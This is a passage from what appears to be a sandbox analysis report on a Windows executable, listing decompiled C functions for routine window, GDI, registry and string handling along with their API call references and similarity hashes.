                                            									continue;
                                            								} else {
                                            									goto L4;
                                            								}
                                            							}
                                            						}
                                            						return E00429977(0) | 0xffffffff;
                                            					}
                                            					if( *((intOrPtr*)(_t81 + 0x10)) != 0) {
                                            						E0041668C(_t78, 1);
                                            						UpdateWindow( *(_t78 + 0x1c));
                                            						 *((intOrPtr*)(_t81 + 0x10)) = 0;
                                            					}
                                            					if(( *(_t81 + 0x24) & 0x00000001) == 0 &&  *(_t81 + 0x1c) != 0 &&  *(_t81 + 0x14) == 0) {
                                            						SendMessageA( *(_t81 + 0x28), 0x121, 0,  *(_t78 + 0x1c));
                                            					}
                                            					if(( *(_t81 + 0x24) & 0x00000002) != 0) {
                                            						L14:
                                            						 *((intOrPtr*)(_t81 + 0x18)) = 0;
                                            						goto L4;
                                            					} else {
                                            						 *(_t81 + 0x14) =  *(_t81 + 0x14) + 1;
                                            						if(SendMessageA( *(_t78 + 0x1c), 0x36a, 0,  *(_t81 + 0x14)) != 0) {
                                            							goto L4;
                                            						}
                                            						goto L14;
                                            					}
                                            				}
                                            				_t66 = E00416528(__ecx);
                                            				 *((intOrPtr*)(_t81 + 0x10)) = _t67;
                                            				if((_t66 & 0x10000000) == 0) {
                                            					goto L3;
                                            				}
                                            				goto L2;
                                            			}











                                            APIs
                                            • GetParent.USER32(?), ref: 00415F4F
                                            • PeekMessageA.USER32(00000000,00000000,00000000,00000000,00000000), ref: 00415F78
                                            • UpdateWindow.USER32(?), ref: 00415F94
                                            • SendMessageA.USER32(?,00000121,00000000,?), ref: 00415FBA
                                            • SendMessageA.USER32(?,0000036A,00000000,00000001), ref: 00415FD9
                                            • UpdateWindow.USER32(?), ref: 0041601C
                                            • PeekMessageA.USER32(00000000,00000000,00000000,00000000,00000000), ref: 0041604F
                                              • Part of subcall function 00416528: GetWindowLongA.USER32 ref: 00416534
                                            Similarity
                                            • API ID: Message$Window$PeekSendUpdate$LongParent
                                            • String ID:
                                            • API String ID: 2853195852-0
                                            • Opcode ID: 9a012ef07eff98838d374f75436147ff2ba7ed0a7bc557100502bfdd7ab44939
                                            • Instruction ID: a9d405acd130b45d961834bac1476ad35e2ab5294cb8f6c1009cd3559e17cf10
                                            • Opcode Fuzzy Hash: 9a012ef07eff98838d374f75436147ff2ba7ed0a7bc557100502bfdd7ab44939
                                            • Instruction Fuzzy Hash: 49418030604B41DBD720DF26C844E9BBFE4FFC5B54F140A1EF48186291D779D986CA9A
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E004296EA(void* __ebx, int __ecx, void* __edi, intOrPtr _a4) {
                                            				struct HDC__* _t26;
                                            				struct tagSIZE* _t39;
                                            				int _t43;
                                            				long _t45;
                                            				struct tagSIZE* _t48;
                                            				int _t51;
                                            
                                            				_t41 = __ecx;
                                            				_t51 = __ecx;
                                            				if(_a4 != 0) {
                                            					_t39 = __ecx + 0x38;
                                            					GetViewportExtEx( *(__ecx + 8), _t39);
                                            					_t48 = __ecx + 0x30;
                                            					GetWindowExtEx( *(__ecx + 8), _t48);
                                            					if(_t48->cx > 0xffffc000) {
                                            						while(1) {
                                            							_t41 = _t48->cx;
                                            							if(_t41 >= 0x4000) {
                                            								goto L6;
                                            							}
                                            							_t45 = _t39->cx;
                                            							if(_t45 > 0xffffc000 && _t45 < 0x4000) {
                                            								_t41 = _t41 + _t41;
                                            								_t48->cx = _t41;
                                            								_t39->cx = _t45 + _t45;
                                            								if(_t41 > 0xffffc000) {
                                            									continue;
                                            								}
                                            							}
                                            							goto L6;
                                            						}
                                            					}
                                            					L6:
                                            					if( *(_t51 + 0x34) > 0xffffc000) {
                                            						while(1) {
                                            							_t41 =  *(_t51 + 0x34);
                                            							if(_t41 >= 0x4000) {
                                            								goto L11;
                                            							}
                                            							_t43 =  *(_t51 + 0x3c);
                                            							if(_t43 > 0xffffc000 && _t43 < 0x4000) {
                                            								_t41 = _t41 + _t41;
                                            								 *(_t51 + 0x34) = _t41;
                                            								 *(_t51 + 0x3c) = _t43 + _t43;
                                            								if(_t41 > 0xffffc000) {
                                            									continue;
                                            								}
                                            							}
                                            							goto L11;
                                            						}
                                            					}
                                            					L11:
                                            					_t39->cx = E00428907(_t41, _t39->cx,  *((intOrPtr*)(_t51 + 0x10)),  *0x439bf8,  *((intOrPtr*)(_t51 + 0x14)), GetDeviceCaps( *(_t51 + 8), 0x58));
                                            					 *(_t51 + 0x3c) = E00428907(_t41,  *(_t51 + 0x3c),  *((intOrPtr*)(_t51 + 0x10)),  *0x439bfc,  *((intOrPtr*)(_t51 + 0x14)), GetDeviceCaps( *(_t51 + 8), 0x5a));
                                            				}
                                            				_t26 =  *(_t51 + 4);
                                            				if(_t26 != 0) {
                                            					SetMapMode(_t26, 8);
                                            					SetWindowExtEx( *(_t51 + 4),  *(_t51 + 0x30),  *(_t51 + 0x34), 0);
                                            					SetViewportExtEx( *(_t51 + 4),  *(_t51 + 0x38),  *(_t51 + 0x3c), 0);
                                            					return E004297EF(_t51);
                                            				}
                                            				return _t26;
                                            			}









                                            APIs
                                            • GetViewportExtEx.GDI32(?,?,?,?,?,00429056,00000001), ref: 00429701
                                            • GetWindowExtEx.GDI32(?,?,?,?,?,00429056,00000001), ref: 0042970E
                                            • GetDeviceCaps.GDI32(?,00000058), ref: 00429779
                                            • GetDeviceCaps.GDI32(?,0000005A), ref: 00429796
                                            • SetMapMode.GDI32(00000000,00000008), ref: 004297BC
                                            • SetWindowExtEx.GDI32(00000000,?,?,00000000), ref: 004297CD
                                            • SetViewportExtEx.GDI32(00000000,?,?,00000000), ref: 004297DE
                                            Similarity
                                            • API ID: CapsDeviceViewportWindow$Mode
                                            • String ID:
                                            • API String ID: 396987064-0
                                            • Opcode ID: 3345bb5a9094e8666eaa33ece795193da96925dfc51a5fc8830be66225611f93
                                            • Instruction ID: 029ae3144c04a12eb84a26ff9b3d66945ac525f496733399c5de6a1960b9f250
                                            • Opcode Fuzzy Hash: 3345bb5a9094e8666eaa33ece795193da96925dfc51a5fc8830be66225611f93
                                            • Instruction Fuzzy Hash: F2312871200A11EFDB715F25EE80B2BBBB6FF94700B90982DE28691A60D775A8519B08
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • PeekMessageA.USER32(?,00000000,0000000F,0000000F,00000000), ref: 0041FF8D
                                            • GetMessageA.USER32 ref: 0041FF9B
                                            • DispatchMessageA.USER32 ref: 0041FFAE
                                            • SetRectEmpty.USER32(?), ref: 0041FFD7
                                            • GetDesktopWindow.USER32 ref: 0041FFEF
                                            • LockWindowUpdate.USER32(?,00000000,?,00000000,0000000F,0000000F,00000000), ref: 00420000
                                            • GetDCEx.USER32(?,00000000,00000003,?,00000000,0000000F,0000000F,00000000), ref: 00420017
                                            Similarity
                                            • API ID: Message$Window$DesktopDispatchEmptyLockPeekRectUpdate
                                            • String ID:
                                            • API String ID: 1192691108-0
                                            • Opcode ID: 788c472facf28495b2051c77c94d9c198475e2b8af682ce7500eb59dc763f021
                                            • Instruction ID: 7b4feb9468581440af327a22176e3db1bbe8d75c7627dd3e4d63dbf17c191cc2
                                            • Opcode Fuzzy Hash: 788c472facf28495b2051c77c94d9c198475e2b8af682ce7500eb59dc763f021
                                            • Instruction Fuzzy Hash: 6B2162B1600709AFD7209F65EC84E67BBECFB08384B44483EF545C6151D735F8469B64
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 83%
                                            			E004152C7(struct HDWP__** _a4, struct HWND__* _a8, RECT* _a12) {
                                            				struct tagRECT _v20;
                                            				int _t15;
                                            				int _t23;
                                            				struct HDWP__* _t25;
                                            				struct HWND__* _t26;
                                            				int _t27;
                                            				long _t28;
                                            				struct HDWP__** _t35;
                                            				RECT* _t37;
                                            
                                            				_t26 = _a8;
                                            				_t15 = GetParent(_t26);
                                            				_t35 = _a4;
                                            				_a8 = _t15;
                                            				if(_t35 == 0 ||  *_t35 != 0) {
                                            					GetWindowRect(_t26,  &_v20);
                                            					ScreenToClient(_a8,  &_v20);
                                            					ScreenToClient(_a8,  &(_v20.right));
                                            					_t37 = _a12;
                                            					_t15 = EqualRect( &_v20, _t37);
                                            					if(_t15 == 0) {
                                            						_t23 = _t37->top;
                                            						_t27 = _t37->left;
                                            						_t28 = _t37->bottom;
                                            						_push(0x14);
                                            						if(_t35 == 0) {
                                            							return SetWindowPos(_t26, 0, _t27, _t23, _t37->right - _t27, _t28 - _t23, ??);
                                            						}
                                            						_t25 = DeferWindowPos( *_t35, _t26, 0, _t27, _t23, _t37->right - _t27, _t28 - _t23, ??);
                                            						 *_t35 = _t25;
                                            						return _t25;
                                            					}
                                            				}
                                            				return _t15;
                                            			}













                                            APIs
                                            • GetParent.USER32(?), ref: 004152D4
                                            • GetWindowRect.USER32 ref: 004152EE
                                            • ScreenToClient.USER32 ref: 00415301
                                            • ScreenToClient.USER32 ref: 0041530A
                                            • EqualRect.USER32 ref: 00415314
                                            • DeferWindowPos.USER32(?,?,00000000,?,?,?,?,00000014), ref: 0041533C
                                            • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?,00000000,00000000,?), ref: 00415354
                                            Similarity
                                            • API ID: Window$ClientRectScreen$DeferEqualParent
                                            • String ID:
                                            • API String ID: 443303494-0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E00425DE9(intOrPtr __ecx) {
                                            				void* _v8;
                                            				void* _v12;
                                            				void* _v16;
                                            				int _v20;
                                            				intOrPtr _v24;
                                            				intOrPtr _t32;
                                            
                                            				_t32 = __ecx;
                                            				_v24 = __ecx;
                                            				_v16 = 0;
                                            				_v8 = 0;
                                            				_v12 = 0;
                                            				if(RegOpenKeyExA(0x80000001, "software", 0, 0x2001f,  &_v8) == 0 && RegCreateKeyExA(_v8,  *(_t32 + 0x7c), 0, 0, 0, 0x2001f, 0,  &_v12,  &_v20) == 0) {
                                            					RegCreateKeyExA(_v12,  *(_v24 + 0x90), 0, 0, 0, 0x2001f, 0,  &_v16,  &_v20);
                                            				}
                                            				if(_v8 != 0) {
                                            					RegCloseKey(_v8);
                                            				}
                                            				if(_v12 != 0) {
                                            					RegCloseKey(_v12);
                                            				}
                                            				return _v16;
                                            			}










                                            APIs
                                            • RegOpenKeyExA.ADVAPI32(80000001,software,00000000,0002001F,?,?,00000000), ref: 00425E17
                                            • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?,?,00000000), ref: 00425E3A
                                            • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?,?,00000000), ref: 00425E59
                                            • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00425E69
                                            • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00425E73
                                            Similarity
                                            • API ID: CloseCreate$Open
                                            • String ID: software
                                            • API String ID: 1740278721-2010147023
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 56%
                                            			E00404F6B(intOrPtr _a4, intOrPtr* _a8) {
                                            				void _v20;
                                            				int _t18;
                                            				intOrPtr* _t22;
                                            				intOrPtr _t30;
                                            
                                            				if(E00404DD2() == 0) {
                                            					if(_a4 != 0x12340042) {
                                            						L9:
                                            						return 0;
                                            					}
                                            					_t22 = _a8;
                                            					if(_t22 == 0 ||  *_t22 < 0x28 || SystemParametersInfoA(0x30, 0,  &_v20, 0) == 0) {
                                            						goto L9;
                                            					} else {
                                            						 *((intOrPtr*)(_t22 + 4)) = 0;
                                            						 *((intOrPtr*)(_t22 + 8)) = 0;
                                            						 *((intOrPtr*)(_t22 + 0xc)) = GetSystemMetrics(0);
                                            						_t18 = GetSystemMetrics(1);
                                            						asm("movsd");
                                            						asm("movsd");
                                            						asm("movsd");
                                            						asm("movsd");
                                            						_t30 = 1;
                                            						 *(_t22 + 0x10) = _t18;
                                            						 *((intOrPtr*)(_t22 + 0x24)) = _t30;
                                            						if( *_t22 >= 0x48) {
                                            							lstrcpyA(_t22 + 0x28, "DISPLAY");
                                            						}
                                            						return _t30;
                                            					}
                                            				}
                                            				return  *0x439618(_a4, _a8);
                                            			}








                                            APIs
                                            • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00404FA9
                                            • GetSystemMetrics.USER32 ref: 00404FC1
                                            • GetSystemMetrics.USER32 ref: 00404FC8
                                            • lstrcpyA.KERNEL32(?,DISPLAY), ref: 00404FEC
                                            Similarity
                                            • API ID: System$Metrics$InfoParameterslstrcpy
                                            • String ID: B$DISPLAY
                                            • API String ID: 1409579217-3316187204
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 68%
                                            			E0040381D(intOrPtr _a4) {
                                            				long _v8;
                                            				long _v12;
                                            				struct tagMSG _v40;
                                            
                                            				if(_a4 != 0) {
                                            					_v8 = GetTickCount();
                                            					while(1 != 0) {
                                            						_v12 = GetTickCount();
                                            						if(_v12 < _v8 || _v12 - _v8 > _a4) {
                                            							break;
                                            						} else {
                                            							if(PeekMessageA( &_v40, 0, 0, 0, 0) == 0) {
                                            								Sleep(1);
                                            							} else {
                                            								GetMessageA( &_v40, 0, 0, 0);
                                            								TranslateMessage( &_v40);
                                            								DispatchMessageA( &_v40);
                                            							}
                                            							continue;
                                            						}
                                            					}
                                            					return 1;
                                            				}
                                            				return 1;
                                            			}






                                            Similarity
                                            • API ID: CountTick
                                            • String ID:
                                            • API String ID: 536389180-0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E00417178(void* __ecx) {
                                            				struct HBRUSH__* _t14;
                                            				void* _t18;
                                            
                                            				_t18 = __ecx;
                                            				 *((intOrPtr*)(_t18 + 0x28)) = GetSysColor(0xf);
                                            				 *((intOrPtr*)(_t18 + 0x2c)) = GetSysColor(0x10);
                                            				 *((intOrPtr*)(_t18 + 0x30)) = GetSysColor(0x14);
                                            				 *((intOrPtr*)(_t18 + 0x34)) = GetSysColor(0x12);
                                            				 *((intOrPtr*)(_t18 + 0x38)) = GetSysColor(6);
                                            				 *((intOrPtr*)(_t18 + 0x24)) = GetSysColorBrush(0xf);
                                            				_t14 = GetSysColorBrush(6);
                                            				 *(_t18 + 0x20) = _t14;
                                            				return _t14;
                                            			}






                                            APIs
                                            • GetSysColor.USER32(0000000F), ref: 00417184
                                            • GetSysColor.USER32(00000010), ref: 0041718B
                                            • GetSysColor.USER32(00000014), ref: 00417192
                                            • GetSysColor.USER32(00000012), ref: 00417199
                                            • GetSysColor.USER32(00000006), ref: 004171A0
                                            • GetSysColorBrush.USER32(0000000F), ref: 004171AD
                                            • GetSysColorBrush.USER32(00000006), ref: 004171B4
                                            Similarity
                                            • API ID: Color$Brush
                                            • String ID:
                                            • API String ID: 2798902688-0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E0042047F() {
                                            				long _t5;
                                            				int _t6;
                                            
                                            				if((0x80000000 & GetVersion()) == 0 || GetVersion() != 4) {
                                            					_t5 = GetVersion();
                                            					if((0x80000000 & _t5) != 0) {
                                            						L6:
                                            						 *0x439628 =  *0x439628 & 0x00000000;
                                            						return _t5;
                                            					}
                                            					_t5 = GetVersion();
                                            					if(_t5 != 3) {
                                            						goto L6;
                                            					}
                                            					goto L5;
                                            				} else {
                                            					L5:
                                            					_t6 = RegisterWindowMessageA("MSWHEEL_ROLLMSG");
                                            					 *0x439628 = _t6;
                                            					return _t6;
                                            				}
                                            			}





                                            Similarity
                                            • API ID: Version$MessageRegisterWindow
                                            • String ID: MSWHEEL_ROLLMSG
                                            • API String ID: 303823969-2485103130
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 91%
                                            			E00426D87(void* __ecx) {
                                            				struct HDC__* _t87;
                                            				intOrPtr* _t88;
                                            				struct HDC__* _t97;
                                            				intOrPtr _t98;
                                            				int _t100;
                                            				struct HDC__* _t110;
                                            				int _t122;
                                            				intOrPtr* _t126;
                                            				void* _t136;
                                            				intOrPtr* _t137;
                                            				struct HDC__** _t138;
                                            				int _t153;
                                            				intOrPtr _t157;
                                            				signed short _t171;
                                            				int _t175;
                                            				void* _t178;
                                            				void* _t180;
                                            
                                            				E00406520(E0042A133, _t180);
                                            				_t178 = __ecx;
                                            				 *(__ecx + 0x70) =  *(_t180 + 8);
                                            				_t87 = E004131DD(0x3c);
                                            				 *(_t180 + 8) = _t87;
                                            				 *(_t180 - 4) =  *(_t180 - 4) & 0x00000000;
                                            				if(_t87 == 0) {
                                            					_t88 = 0;
                                            					__eflags = 0;
                                            				} else {
                                            					_t88 = E00428824(_t87);
                                            				}
                                            				 *((intOrPtr*)(_t178 + 0x114)) = _t88;
                                            				 *(_t180 - 4) =  *(_t180 - 4) | 0xffffffff;
                                            				 *((intOrPtr*)( *_t88 + 0x3c)) = 0x7009;
                                            				_t175 = 1;
                                            				 *( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t178 + 0x114)))) + 0x5c)) + 0x14) =  *( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t178 + 0x114)))) + 0x5c)) + 0x14) | 0x00000040;
                                            				 *( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t178 + 0x114)))) + 0x5c)) + 0x15) =  *( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t178 + 0x114)))) + 0x5c)) + 0x15) & 0x000000fe;
                                            				 *( *((intOrPtr*)(_t178 + 0x114)) + 8) = _t175;
                                            				_t97 = E004131DD(0x40);
                                            				 *(_t180 + 8) = _t97;
                                            				_t186 = _t97;
                                            				 *(_t180 - 4) = _t175;
                                            				if(_t97 == 0) {
                                            					_t98 = 0;
                                            					__eflags = 0;
                                            				} else {
                                            					_t98 = E00428A66(_t97, _t186);
                                            				}
                                            				 *(_t180 - 4) =  *(_t180 - 4) | 0xffffffff;
                                            				 *((intOrPtr*)(_t178 + 0x74)) = _t98;
                                            				_t100 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t178 + 0x70)))) + 0xf4))( *((intOrPtr*)(_t178 + 0x114)));
                                            				if(_t100 != 0) {
                                            					_t137 = _t178 + 0x78;
                                            					E00419BB7(_t137,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t178 + 0x114)))) + 0x5c)) + 0x10)));
                                            					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t178 + 0x74)))) + 0xc))( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t178 + 0x114)))) + 0x5c)) + 0x10)), _t136);
                                            					 *( *((intOrPtr*)(_t178 + 0x74)) + 0xc) = _t175;
                                            					 *(_t178 + 0x84) = _t175;
                                            					 *((intOrPtr*)( *_t137 + 0x1c))();
                                            					_t110 = GetDC( *(_t178 + 0x1c));
                                            					 *(_t180 + 8) = _t110;
                                            					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t178 + 0x74)))) + 0x10))(_t110);
                                            					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t178 + 0x70)))) + 0xf8))( *((intOrPtr*)(_t178 + 0x74)),  *((intOrPtr*)(_t178 + 0x114)));
                                            					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t178 + 0x74)))) + 0x18))();
                                            					ReleaseDC( *(_t178 + 0x1c),  *(_t180 + 8));
                                            					 *((intOrPtr*)( *_t137 + 0x20))(0xffffffff);
                                            					_t138 = _t178 + 0x80;
                                            					 *((intOrPtr*)(_t178 + 0x104)) = GetDeviceCaps( *_t138, 0x58);
                                            					 *((intOrPtr*)(_t178 + 0x108)) = GetDeviceCaps( *_t138, 0x5a);
                                            					_t122 =  *( *((intOrPtr*)(_t178 + 0x114)) + 0x18);
                                            					_t188 = _t122;
                                            					 *(_t178 + 0xf8) = _t122;
                                            					if(_t122 != 0) {
                                            						_t153 =  *(_t178 + 0xf0);
                                            						__eflags = _t122 - _t153;
                                            						if(__eflags > 0) {
                                            							 *(_t178 + 0xf8) = _t153;
                                            						}
                                            					} else {
                                            						 *(_t178 + 0xf8) = _t175;
                                            					}
                                            					 *(_t178 + 0xe8) =  *(_t178 + 0xf8);
                                            					_push(0x42e4b0);
                                            					_push(0x42e4b0);
                                            					_push(_t175);
                                            					_push(_t175);
                                            					_push(_t175);
                                            					E0041AE9C(_t178, _t188);
                                            					_t126 =  *((intOrPtr*)(_t178 + 0x114));
                                            					_t157 =  *((intOrPtr*)( *_t126 + 0x5c));
                                            					_t171 =  *((intOrPtr*)(_t157 + 0x1e));
                                            					if(_t171 >= 0x8000 || (_t171 & 0x0000ffff) - ( *(_t157 + 0x1c) & 0x0000ffff) > 0x7fff) {
                                            						ShowScrollBar( *(_t178 + 0x1c), _t175, 0);
                                            					} else {
                                            						 *((intOrPtr*)(_t180 - 0x24)) = 3;
                                            						 *(_t180 - 0x20) =  *( *((intOrPtr*)( *_t126 + 0x5c)) + 0x1c) & 0x0000ffff;
                                            						 *(_t180 - 0x1c) =  *( *((intOrPtr*)( *_t126 + 0x5c)) + 0x1e) & 0x0000ffff;
                                            						 *(_t180 - 0x18) = _t175;
                                            						if(E00415006(_t178, _t175, _t180 - 0x28, 0) == 0) {
                                            							E00414F60(_t178, _t175,  *(_t180 - 0x20),  *(_t180 - 0x1c), 0);
                                            						}
                                            					}
                                            					E00427C71(_t178,  *((intOrPtr*)( *((intOrPtr*)(_t178 + 0x114)) + 0x14)), _t175);
                                            					_t100 = _t175;
                                            				}
                                            				 *[fs:0x0] =  *((intOrPtr*)(_t180 - 0xc));
                                            				return _t100;
                                            			}




















                                            APIs
                                            • __EH_prolog.LIBCMT ref: 00426D8C
                                            • GetDC.USER32(?), ref: 00426E7B
                                            • ReleaseDC.USER32 ref: 00426EAF
                                            • GetDeviceCaps.GDI32(?,00000058), ref: 00426EC8
                                            • GetDeviceCaps.GDI32(?,0000005A), ref: 00426ED8
                                              • Part of subcall function 00428824: __EH_prolog.LIBCMT ref: 00428829
                                            • ShowScrollBar.USER32(?,00000001,00000000,00000001,00000001,00000001,0042E4B0,0042E4B0), ref: 00426FA0
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_sort.jbxd
                                            Similarity
                                            • API ID: CapsDeviceH_prolog$ReleaseScrollShow
                                            • String ID:
                                            • API String ID: 603669091-0
                                            • Opcode ID: 479707f173c4057112b4671a433d92b04c0141629a29cc01e59d35c96becf872
                                            • Instruction ID: f5d210ee154f7f1b627b2ce3caee5c8d10a4320e645ae6f080698531d27b521b
                                            • Opcode Fuzzy Hash: 479707f173c4057112b4671a433d92b04c0141629a29cc01e59d35c96becf872
                                            • Instruction Fuzzy Hash: E0716870600A00DFCB29DF68D984AAABBF5FF48310F51456EE56ACB3A1DB34E841CB54
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 78%
                                            			E0040A040(int _a4, char* _a8, int _a12, short* _a16, int _a20, int _a24, signed int _a28) {
                                            				int _v8;
                                            				intOrPtr _v20;
                                            				short* _v28;
                                            				short _v32;
                                            				int _v36;
                                            				short* _v40;
                                            				void* _v56;
                                            				int _t31;
                                            				int _t32;
                                            				int _t37;
                                            				int _t43;
                                            				int _t44;
                                            				int _t45;
                                            				void* _t53;
                                            				short* _t60;
                                            				int _t61;
                                            				intOrPtr _t62;
                                            				short* _t63;
                                            
                                            				_push(0xffffffff);
                                            				_push(0x42f5e8);
                                            				_push(E00409800);
                                            				_push( *[fs:0x0]);
                                            				 *[fs:0x0] = _t62;
                                            				_t63 = _t62 - 0x18;
                                            				_v28 = _t63;
                                            				_t31 =  *0x439f04; // 0x1
                                            				if(_t31 != 0) {
                                            					L6:
                                            					if(_t31 != 2) {
                                            						if(_t31 != 1) {
                                            							goto L18;
                                            						} else {
                                            							if(_a20 == 0) {
                                            								_t44 =  *0x439efc; // 0x0
                                            								_a20 = _t44;
                                            							}
                                            							asm("sbb eax, eax");
                                            							_t37 = MultiByteToWideChar(_a20, ( ~_a28 & 0x00000008) + 1, _a8, _a12, 0, 0);
                                            							_v36 = _t37;
                                            							if(_t37 == 0) {
                                            								goto L18;
                                            							} else {
                                            								_v8 = 0;
                                            								E00406830(_t37 + _t37 + 0x00000003 & 0x000000fc, _t53);
                                            								_v28 = _t63;
                                            								_t60 = _t63;
                                            								_v40 = _t60;
                                            								E00406330(_t60, 0, _t37 + _t37);
                                            								_v8 = _v8 | 0xffffffff;
                                            								if(_t60 == 0) {
                                            									goto L18;
                                            								} else {
                                            									_t43 = MultiByteToWideChar(_a20, 1, _a8, _a12, _t60, _v36);
                                            									if(_t43 == 0) {
                                            										goto L18;
                                            									} else {
                                            										_t32 = GetStringTypeW(_a4, _t60, _t43, _a16);
                                            									}
                                            								}
                                            							}
                                            						}
                                            					} else {
                                            						_t45 = _a24;
                                            						if(_t45 == 0) {
                                            							_t45 =  *0x439eec; // 0x0
                                            						}
                                            						_t32 = GetStringTypeA(_t45, _a4, _a8, _a12, _a16);
                                            					}
                                            				} else {
                                            					_push( &_v32);
                                            					_t61 = 1;
                                            					if(GetStringTypeW(_t61, 0x42f5cc, _t61, ??) == 0) {
                                            						if(GetStringTypeA(0, _t61, 0x42f5c8, _t61,  &_v32) == 0) {
                                            							L18:
                                            							_t32 = 0;
                                            						} else {
                                            							_t31 = 2;
                                            							goto L5;
                                            						}
                                            					} else {
                                            						_t31 = _t61;
                                            						L5:
                                            						 *0x439f04 = _t31;
                                            						goto L6;
                                            					}
                                            				}
                                            				 *[fs:0x0] = _v20;
                                            				return _t32;
                                            			}





















                                            APIs
                                            • GetStringTypeW.KERNEL32(00000001,0042F5CC,00000001,00000000,?,00000100,00000000,00406E03,00000001,00000020,00000100,?,00000000), ref: 0040A07F
                                            • GetStringTypeA.KERNEL32(00000000,00000001,0042F5C8,00000001,00000000,?,00000100,00000000,00406E03,00000001,00000020,00000100,?,00000000), ref: 0040A099
                                            • GetStringTypeA.KERNEL32(00000000,?,00000100,00000020,00000001,?,00000100,00000000,00406E03,00000001,00000020,00000100,?,00000000), ref: 0040A0CD
                                            • MultiByteToWideChar.KERNEL32(00406E03,00000101,00000100,00000020,00000000,00000000,?,00000100,00000000,00406E03,00000001,00000020,00000100,?,00000000), ref: 0040A105
                                            • MultiByteToWideChar.KERNEL32(00406E03,00000001,00000100,00000020,?,00000100,?,00000100,00000000,00406E03,00000001,00000020,00000100,?), ref: 0040A15B
                                            • GetStringTypeW.KERNEL32(?,?,00000000,00000001,?,00000100,?,00000100,00000000,00406E03,00000001,00000020,00000100,?), ref: 0040A16D
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_sort.jbxd
                                            Similarity
                                            • API ID: StringType$ByteCharMultiWide
                                            • String ID:
                                            • API String ID: 3852931651-0
                                            • Opcode ID: 7978bb901a9e5ef37ad4b01f25115386a243d4b412b3fda7648c38b4a11906ce
                                            • Instruction ID: 7d97f644f5b15e7df2d58104b9ea96a21cdc8e77f8ddbf007f82d689378feb8c
                                            • Opcode Fuzzy Hash: 7978bb901a9e5ef37ad4b01f25115386a243d4b412b3fda7648c38b4a11906ce
                                            • Instruction Fuzzy Hash: 7B41A272600219BFCF219F54CC85EAF3F79EB08350F104536F911E6290D3398961CB9A
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 90%
                                            			E00424DFE(intOrPtr __ecx, void* __esi) {
                                            				intOrPtr _t51;
                                            				void* _t53;
                                            				intOrPtr _t58;
                                            				signed int _t59;
                                            				signed int _t77;
                                            				intOrPtr _t84;
                                            				intOrPtr* _t86;
                                            				void* _t88;
                                            				CHAR** _t90;
                                            				void* _t91;
                                            
                                            				E00406520(E0042A538, _t91);
                                            				_t84 = __ecx;
                                            				 *((intOrPtr*)(_t91 - 0x1c)) = __ecx;
                                            				_t51 = E00424F37(__ecx,  *((intOrPtr*)(_t91 + 0xc)), 0x14);
                                            				if(_t51 == 0) {
                                            					L19:
                                            					 *[fs:0x0] =  *((intOrPtr*)(_t91 - 0xc));
                                            					return _t51;
                                            				}
                                            				_t97 =  *((intOrPtr*)(_t91 + 8));
                                            				 *((intOrPtr*)(_t91 - 0x18)) = 1;
                                            				if( *((intOrPtr*)(_t91 + 8)) == 0) {
                                            					L18:
                                            					E0042500B(_t84, 1, 1);
                                            					_t51 =  *((intOrPtr*)(_t91 - 0x18));
                                            					goto L19;
                                            				}
                                            				_t53 = SendMessageA( *(_t84 + 0x1c), 0x31, 0, 0);
                                            				_push(0);
                                            				_t88 = _t53;
                                            				E0041A369(_t91 - 0x38, _t97);
